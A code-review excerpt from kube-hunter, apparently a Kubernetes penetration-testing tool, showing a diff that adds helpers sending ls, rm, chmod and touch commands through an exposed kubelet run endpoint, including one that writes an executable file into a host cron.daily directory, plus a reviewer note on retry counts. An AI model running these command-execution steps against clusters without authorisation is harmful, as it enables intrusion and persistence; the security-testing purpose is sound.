kube_hunter/modules/hunting/kubelet.py

```diff
@@ -434,6 +452,453 @@ def is_kubesystem_pod(pod):
+        file_exists = MaliciousIntentViaSecureKubeletPort.ls_command(run_request_url, file)
+
+        return FootholdViaSecureKubeletPort.has_no_error_nor_exception(file_exists)
+
+    @staticmethod
+    def rm_command(run_request_url, file_to_remove, seconds_to_wait_for_os_command):
+        if MaliciousIntentViaSecureKubeletPort.check_file_exists(run_request_url, file_to_remove):
+            for _ in range(10):
+                command_execution_outcome = FootholdViaSecureKubeletPort.post_request(
+                    run_request_url, {"cmd": "rm -f {}".format(file_to_remove)}
+                )
+
+                if seconds_to_wait_for_os_command:
+                    time.sleep(seconds_to_wait_for_os_command)
+
+                first_check = FootholdViaSecureKubeletPort.has_no_error_nor_exception(command_execution_outcome)
+                second_check = MaliciousIntentViaSecureKubeletPort.check_file_exists(run_request_url, file_to_remove)
+
+                if first_check and not second_check:
+                    return True
+
+        return False
+
+    @staticmethod
+    def chmod_command(run_request_url, permissions, file):
+        return FootholdViaSecureKubeletPort.post_request(
+            run_request_url, {"cmd": "chmod {} {}".format(permissions, file)}
+        )
+
+    @staticmethod
+    def touch_command(run_request_url, file_to_create):
+        return FootholdViaSecureKubeletPort.post_request(run_request_url, {"cmd": "touch {}".format(file_to_create)})
+
+    def attack_exposed_existing_privileged_container(
+        self, run_request_url, directory_created, seconds_to_wait_for_os_command, file_name=None
+    ):
+        if file_name is None:
+            file_name = "harmless-honestly" + str(uuid.uuid1())
+
+        file_name_with_path = "{}/etc/cron.daily/{}".format(directory_created, file_name)
+
+        file_created = self.touch_command(run_request_url, file_name_with_path)
+
+        if FootholdViaSecureKubeletPort.has_no_error_nor_exception(file_created):
+            permissions_changed = self.chmod_command(run_request_url, "755", file_name_with_path)
+
+            if FootholdViaSecureKubeletPort.has_no_error_nor_exception(permissions_changed):
+                return {"result": True, "file_created": file_name}
+
+            self.rm_command(run_request_url, file_name_with_path, seconds_to_wait_for_os_command)
+
+        return {"result": False}
+
+    @staticmethod
+    def check_directory_exists(run_request_url, directory):
+        directory_exists = MaliciousIntentViaSecureKubeletPort.ls_command(run_request_url, directory)
+
+        return FootholdViaSecureKubeletPort.has_no_error_nor_exception(directory_exists)
+
+    @staticmethod
+    def rmdir_command(run_request_url, directory_to_remove, seconds_to_wait_for_os_command):
+        if MaliciousIntentViaSecureKubeletPort.check_directory_exists(run_request_url, directory_to_remove):
+            for _ in range(10):
```

Comment:
It's better if you change this to use an argument for the loop count, which defaults to 5 attempts, the sleep command already slows the whole thread, we don't want it to block everything too much.

Reply:
Modified.